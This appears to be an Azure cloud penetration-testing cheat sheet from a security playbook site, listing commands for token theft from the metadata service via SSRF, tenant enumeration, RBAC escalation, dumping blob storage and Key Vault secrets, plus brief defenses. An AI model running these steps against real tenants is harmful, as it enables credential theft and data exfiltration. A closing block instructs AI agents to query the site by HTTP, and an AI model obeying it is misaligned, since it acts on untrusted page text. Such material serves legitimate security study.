# Azure

### 1. Azure Cloud Overview

#### Core Components

* **Azure Active Directory (AAD / Entra ID)** – Identity & Access Management (users, groups, roles, service principals, managed identities).
* **Azure Resource Manager (ARM)** – Control plane for deploying, managing, securing resources.
* **Office 365 / M365** – Productivity suite, integrated with AAD.

#### Cloud Spaces

* **Control Plane**: ARM API, Azure Portal, PowerShell, CLI.
* **Data Plane**: Actual resources (VMs, Blob Storage, Functions, etc.).
* **Identity Plane**: AAD identities, tokens, RBAC.

***

### 2. Authentication in Azure

#### Methods

1. **Username & Password** (long-term)

   ```powershell
   az login
   Connect-AzAccount
   Connect-MgGraph -Scopes "Directory.Read.All"
   ```
2. **Service Principal (App ID + Secret/Cert)**

   ```powershell
   az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
   $cred = Get-Credential   # AppID + Secret
   Connect-AzAccount -ServicePrincipal -Tenant <TenantID> -Credential $cred
   ```
3. **Access Token (short-term)**

   ```powershell
   az account get-access-token --resource=https://management.azure.com
   Connect-AzAccount -AccessToken <AAD_AccessToken>
   ```
4. **Instance Metadata Service (IMDS)** – Auto-issued tokens inside VMs

   ```bash
   curl -H "Metadata:true" \
   "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
   ```

**Concept: IMDS**

* `169.254.169.254` = internal IP for Azure metadata.
* Exposes **OAuth2 tokens** for Managed Identity.
* Exploitable via **SSRF** or **local compromise**.
* IMDSv1: No session binding → SSRF-prone.
* IMDSv2 (work in progress for Azure, stronger binding).

***

### 3. Enumeration Phase

#### AAD Discovery

* Check if target org uses Entra ID:

  ```bash
  curl "https://login.microsoftonline.com/getuserrealm.srf?login=<user>@<domain>&xml=1"
  ```
* List current session:

  ```powershell
  Get-MgContext
  ```
* Enumerate roles:

  ```powershell
  Get-MgDirectoryRole | ConvertTo-Json
  Get-MgDirectoryRoleMember -DirectoryRoleId <RoleID> -All | ConvertTo-Json
  ```
* Enumerate users & groups:

  ```powershell
  Get-MgUser
  Get-MgUserMemberOf -UserId <UserID>
  Get-MgGroup
  Get-MgGroupMember -GroupId <GroupID> | ConvertTo-Json
  ```
* Applications / Service Principals:

  ```powershell
  Get-MgApplication
  Get-MgApplication -ApplicationId <AppObjectID> | ConvertTo-Json
  Get-MgApplicationOwner -ApplicationId <AppObjectID> | ConvertTo-Json
  ```

***

### 4. Exploitation Scenarios

#### 4.1 SSRF → IMDS Token Theft

1. Find SSRF in a web app on Azure VM.
2. Target IMDS endpoint:

   ```bash
   curl -H "Metadata:true" \
   "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"
   ```

   → Returns access token for **Microsoft Graph API**.
3. Configure with stolen creds:

   ```powershell
   az account get-access-token --resource https://graph.microsoft.com
   Connect-AzAccount -AccessToken <Token>
   ```
4. Enumerate tenant, users, groups with Graph API.

***

#### 4.2 ARM Token Abuse

* Request ARM-scoped token from IMDS:

  ```bash
  curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
  ```
* Enumerate resources:

  ```bash
  az vm list --output table
  az storage account list --output table
  ```

***

#### 4.3 Privilege Escalation via RBAC

* List roles:

  ```bash
  az role assignment list --all
  ```
* If attacker has **Owner/Contributor** → can create new role or assign higher privileges.
* Example: Attach `User Access Administrator` → take over.

***

#### 4.4 Service Principal Abuse

* If SP creds are leaked (from GitHub, etc.):

  ```bash
  az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
  ```
* Check assigned roles → escalate or pivot.

***

### 5. Post-Exploitation

* Dump data from Blob Storage:

  ```bash
  az storage blob list --account-name <storage> --container-name <container>
  az storage blob download --account-name <storage> --container-name <container> --name <blob> --file dump.txt
  ```
* Enumerate Key Vault secrets:

  ```bash
  az keyvault secret list --vault-name <vault>
  az keyvault secret show --vault-name <vault> --name <secret>
  ```

***

### 6. Lateral Movement

* Use stolen tokens to **pivot tenants/subscriptions**.
* Exploit **custom role definitions** to gain indirect access.
* Example scenario from CTF (generalized):
  * Attacker compromises VM → retrieves IMDS token.
  * Token has **Reader** role at subscription level.
  * However, token also has custom role at VM resource scope → allows reading group info.
  * From there, attacker enumerates applications and pivots via Graph API.

***

### 7. Detection & Defense

* **Enable Azure AD logs & alerts**: Monitor anomalous logins, token use.
* **Restrict IMDS exposure**: Disable public endpoints, enforce network rules.
* **Use Conditional Access**: Restrict Graph API access by location/device.
* **RBAC Hardening**: Audit custom roles, remove broad assignments.
* **Key Vault**: Enable firewall & access policies.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/cloud-security/azure.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.